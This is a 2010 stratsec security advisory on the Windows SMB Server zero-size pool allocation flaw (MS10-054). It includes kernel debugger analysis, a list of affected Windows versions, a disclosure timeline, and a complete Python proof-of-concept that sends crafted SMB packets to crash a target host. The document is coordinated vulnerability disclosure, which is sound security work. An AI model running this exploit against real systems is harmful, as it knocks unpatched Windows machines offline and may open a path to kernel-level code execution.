Microsoft SMB Server Zero Size Pool Allocation

`===============================================================================  
stratsec Security Advisory: SS-2010-007 MS SMB Server Zero Size Pool Allocation  
===============================================================================  
  
Title: SS-2010-007 Microsoft SMB Server Zero Size Pool Allocation  
Version: 1.0  
Issue type: Pool Corruption  
Affected vendor: Microsoft  
Release date: 11/08/2010  
Discovered by: Laurent Gaffié  
Advisory by: Laurent Gaffié  
Issue status: Patch available  
  
===============================================================================  
  
Summary  
-------  
  
A vulnerability in the Windows kernel can be triggered via SMB in Microsoft   
Windows versions ranging from Windows 2000 through to Windows 7. This   
vulnerability allows an attacker to trigger a kernel pool corruption by sending  
a specially crafted SMB_COM_TRANSACTION2 request.Successful exploitation of   
this issue may result in remote code execution with kernel privileges, while  
failed attempts will result in a Denial of Service condition.Microsoft has  
published a patch to resolve the issue  
  
  
Technical details  
-----------------  
  
The following analysis has been performed on an up-to-date Windows 7 x86-32  
system.The issue is triggered by sending a crafted SMB_COM_TRANSACTION2   
request:  
- The client connects to a SMB server with at least read privileges on this  
share.  
- The client constructs a malicious Trans2 "QUERY_FS_INFO Query FS Attribute   
info" with the Max DataCount parameter set to 0.   
  
During processing of the query, SrvSmbQueryFsInformation() from srv.sys will  
call NtQueryVolumeInformationFile(FileFsSizeInformation) from ntoskrnl.exe  
NtQueryVolumeInformationFile allocates a pool chunk with a size taken from an  
unverified user input:  
  
kd> nt!NtQueryVolumeInformationFile+0x3de:  
82a5779c ff7514 push dword ptr [ebp+14h] ;User controlled  
82a5779f 50 push eax   
82a577a0 e85d1fe6ff call nt!ExAllocatePoolWithQuotaTag (828b9702)  
82a577a5 eb23 jmp nt!NtQueryVolumeInformationFile+0x40c (82a577ca)  
kd>   
  
The actual code of the NtQueryVolumeInformationFile function looks like this:  
  
NTSTATUS  
NtQueryVolumeInformationFile(IN HANDLE FileHandle,   
OUT PIO_STATUS_BLOCK IoStatusBlock,  
OUT PVOID FileSystemInformation,  
IN ULONG Length,   
IN FS_INFORMATION_CLASS FileSystemInformationClass)  
{  
  
if (RequestorMode != KernelMode)  
{   
}  
  
if (FileSystemInformationClass == FileFsDeviceInformation)  
{  
}  
  
if (FileSystemInformationClass == FileFsDriverPathInformation)  
{  
PFILE_FS_DRIVER_PATH_INFORMATION Buffer, Source;  
Source = (PFILE_FS_DRIVER_PATH_INFORMATION)FileSystemInformation;  
Buffer = (PFILE_FS_DRIVER_PATH_INFORMATION)ExAllocatePoolWithQuota(NonPagedPool, Length);  
  
RtlCopyMemory(Buffer, Source, Length);  
  
NtStatus = IopGetDriverPathInformation(FileObject, Buffer, Length);  
  
// [...]  
if (Buffer) ExFreePool(Buffer);  
}  
  
  
// Issue;  
//SystemBuffer, which is the buffer used for the I/O, can be allocated with   
//a size of zero because of the lack of length sanity check.  
//Later this buffer is used for various operations, which is the source of  
//trouble when the I/O Manager tries to release the buffer.  
  
Irp->AssociatedIrp.SystemBuffer = ExAllocatePoolWithQuota(NonPagedPool,  
Length);  
// This buffer is freed later by the Windows I/O Manager.  
}  
  
  
  
Impact  
------  
  
Successful attempts may allow code execution with kernel privileges, failed  
attempts will result in a denial of service (B.S.O.D).  
  
Affected products  
-----------------  
  
Windows:  
- 2000  
- XP  
- 2003  
- Vista  
- 2008  
- 7  
- 2008R2  
  
  
  
Proof of concept  
----------------  
  
#!/usr/bin/env python  
import sys,struct,socket  
from socket import *  
  
if len(sys.argv)<=2:  
print '#######################################################################'  
print '# MS10-054 Proof Of Concept'  
print '# Usage: python '+sys.argv[0]+' TARGET SHARE-NAME (No backslash)'  
print '# Example: python '+sys.argv[0]+' 192.168.8.101 users'  
print '#######################################################################\n\n'  
sys.exit()  
  
host = str(sys.argv[1]),445  
  
packetnego = "\x00\x00\x00\x9a"  
packetnego += "\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
packetnego += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc3\x15\x00\x00\x01\x3d"  
packetnego += "\x00\x77\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"  
packetnego += "\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4d\x49\x43\x52"  
packetnego += "\x4f\x53\x4f\x46\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x33"  
packetnego += "\x2e\x30\x00\x02\x44\x4f\x53\x20\x4c\x4d\x31\x2e\x32\x58\x30\x30"  
packetnego += "\x32\x00\x02\x44\x4f\x53\x20\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31"  
packetnego += "\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f"  
packetnego += "\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4e"  
packetnego += "\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"  
  
def tidpiduidfield(data):  
all_=data[28:34]  
return all_  
  
def handle(data):  
##Chained SMB commands; Session Setup AndX Request,Tree connect  
if data[8:10] == "\x72\x00":  
sharename = "\x00\x00\x5c\x5c\x5c"+str(sys.argv[2])+"\x00\x3f\x3f\x3f\x3f\x3f\x00"  
packetsession = "\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00"  
packetsession += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd5\x15\x01\x00\x81\x2f"  
packetsession += "\x0d\x75\x00\x7a\x00\x68\x0b\x32\x00\x00\x00\x00\x00\x00\x00\x18"  
packetsession += "\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x3d\x00\x01\x01\x01"  
packetsession += "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"  
packetsession += "\x01\x01\x01\x01\x01\x59\x4f\x00\x57\x4f\x52\x4b\x47\x52\x4f\x55"  
packetsession += "\x50\x00\x57\x69\x6e\x64\x6f\x77\x73\x20\x34\x2e\x30\x00\x57\x69"  
packetsession += "\x6e\x64\x6f\x77\x73\x20\x34\x2e\x30\x00\x04\xff\x00\x00\x00\x00"  
packetsession += "\x00\x01\x00"+struct.pack(">i", len(sharename))[3:4]+sharename  
print "[+]Session Query sent"   
return struct.pack(">i", len(packetsession))+packetsession  
  
##Trans2, Request, QUERY_FS_INFO Query FS Attribute Info  
if data[8:10] == "\x73\x00":  
packetrans = "\x00\x00\x00\x46"  
packetrans += "\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x01\xc8\x00\x00\x00\x00"  
packetrans += "\x00\x00\x00\x00\x00\x00\x00\x00"+tidpiduidfield(data)+"\x13\x00"  
packetrans += "\x0f\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
packetrans += "\x00\x00\x00\x02\x00\x44\x00\x00\x00\x46\x00\x01\x00\x03\x00\x05"  
packetrans += "\x00\x00\x44\x20\x05\x01"  
print "[+]Malformed Trans2 packet sent\n[+]The target should be down now"  
return packetrans  
  
def run():  
s = socket(AF_INET, SOCK_STREAM)  
s.connect(host)  
s.settimeout(2)   
s.send(packetnego)  
print "[+]Negotiate Protocol Request sent"  
try:  
while True:  
data = s.recv(1024)  
s.send(handle(data))  
except Exception:  
pass  
s.close()  
run()  
  
Solution  
--------  
  
Apply appropriate security patches published by Microsoft in advisory MS10-054.  
Alternatively, configure a firewall to block SMB communications with untrusted  
clients.  
  
Response timeline  
-----------------  
  
* 11/02/2010 - Vendor notified  
* 11/02/2010 - Vendor acknowledges the advisory  
* 16/02/2010 - MSRC confirms issue on Windows 7.  
* 26/02/2010 - MSRC provide a DC number and confirm the vulnerability across   
Windows 2000 to Windows 7.   
* 27/02/2010 - MSRC indicates vulnerability is to be categorised as post-auth  
on all platforms and ask for confirmation. stratsec responds  
with additional information.  
* 11/03/2010 - MSRC confirms issue as a remote unauthenticated code execution  
issue for pre-Windows Vista platforms and upgrades overall   
bulletin severity to Critical  
* 12/03/2010 - MSRC plan to release a patch in June 2010  
* 30/04/2010 - MSRC push back the update to August 2010. stratsec agree on new  
release date.  
* 24/07/2010 - MSRC confirm the patch for August.  
* 05/08/2010 - MSRC propose to give a vendor statement or review this advisory  
* 05/08/2010 - stratsec request the CVE number and advisory link to MSRC, and   
provide this advisory for review.  
* 09/08/2010 - MSRC confirm the technical details of this advisory, and provide  
the CVE and link details.  
* 11/08/2010 - This advisory released.  
  
  
References  
----------  
  
* Vendor advisory: http://www.microsoft.com/technet/security/Bulletin/MS10-054.mspx  
* CVE item: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2550  
  
  
===============================================================================  
  
About stratsec  
--------------  
Stratsec, specialises in providing information security consulting and testing  
services for government and commercial clients. Established in 2004, we are  
now one of the leading independent information security companies in the  
Australasian and SE-Asian region, with offices throughout Australia and in  
Singapore and Malaysia.   
  
For more information, please visit our website at http://www.stratsec.net/   
  
===============================================================================  
--   
Message protected by MailGuard: e-mail anti-virus, anti-spam and content filtering.http://www.mailguard.com.au/mg  
  
`